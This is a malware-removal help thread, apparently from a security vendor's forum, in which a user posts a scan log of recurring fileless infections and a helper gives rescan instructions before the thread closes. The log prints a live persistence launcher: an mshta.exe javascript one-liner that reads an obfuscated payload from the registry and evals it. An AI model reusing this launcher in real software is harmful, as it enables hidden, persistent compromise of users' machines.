Jump to content

Cant delete infections

Recommended Posts

I have Malwarebytes Premium' . I am getting four infections after scanning but every time I delete them and rescan the same infections come back   . I cant get rid fo them . I need some help . Below is my log file

Malwarebytes Anti-Malware

Scan Date: 8/2/2016
Scan Time: 4:48 AM
Logfile: malware.txt
Administrator: Yes

Malware Database: v2016.08.02.04
Rootkit Database: v2016.05.27.01
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Dennis

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 374704
Time Elapsed: 45 min, 24 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-2502185116-3222447240-3444974769-1000_Classes\6C642\SHELL\OPEN\COMMAND, , [4507ce785e3c241282a8f60827dc12ee],

Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-2502185116-3222447240-3444974769-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^snfc, , [3f0d96b03961e45236f7fc04d62e5fa1],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-2502185116-3222447240-3444974769-1000_Classes\6c642\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:iGMo2C6o="WWVMw0u";e49g=new ActiveXObject("WScript.Shell");k3aUCVO3="yC4";w3mIc=e49g.RegRead("HKCU\\software\\rpeb\\efijjlnmef");oyX3ksI2="dt3WSCGF";eval(w3mIc);TwdSq68Nc="C8IjvK9";", , [4507ce785e3c241282a8f60827dc12ee]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Rootkit.Fileless.MTGen, C:\Users\Dennis\AppData\Local\8cff3\923c0.bat, , [dd6f4402d5c5f04624a44954c53fd32d],

Physical Sectors: 0
(No malicious items detected)



Link to post
Share on other sites

:welcome:   Hi.

I will be guiding you, going forward.

I will need to see other diagnostic information from this system.
I would like to ask that you always attach any report or file I ask for, from time to time. Just a regular  attachment.


Lets do a new scan, with these tips / ways.  It seems to me likely you did not check-mark those 4 lines.


Please do a Threat & Rootkit Scan:
Start the Anti-Malware program.
Please look at the Dashboard screen. Would you please press the blue line marked *Update*  and let it update itself.
Click the Settings icon ( on the top bar) > then click Detection and Protection sub-tab, Detection Options, tick the box 'Scan for rootkits'.
Click on the Scan icon ( up on the top row ), then click on Start Scan button >> .

A Threat Scan will begin.

With some infections, you may see this message box.
'Could not load DDA driver'
Click 'Yes' to this message, to allow the driver to load after a restart.
Allow the computer to restart.    ( as needed )

Continue with the rest of these instructions.

When the scan is complete, be sure to press Review results and look at all of the listed items ( if any ).
It there are found items, be sure to have each line item check-box marked with a check-mark  in order to remove them.
click REMOVE Selected button.

Wait for the prompt to restart the computer to appear ( if any ), then click on Yes.
After the scan has completed, Click on the History tab > Application Logs.
Double click on the scan log which shows the Date and time of the scan just performed.
Click the EXPORT button at the bottom left.
Click TEXT file
Be very aware as to what folder and what NAME you give this report.  You have to make a note so you can send it.

Then attach that file with your next reply.


Link to post
Share on other sites

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

This topic is now closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.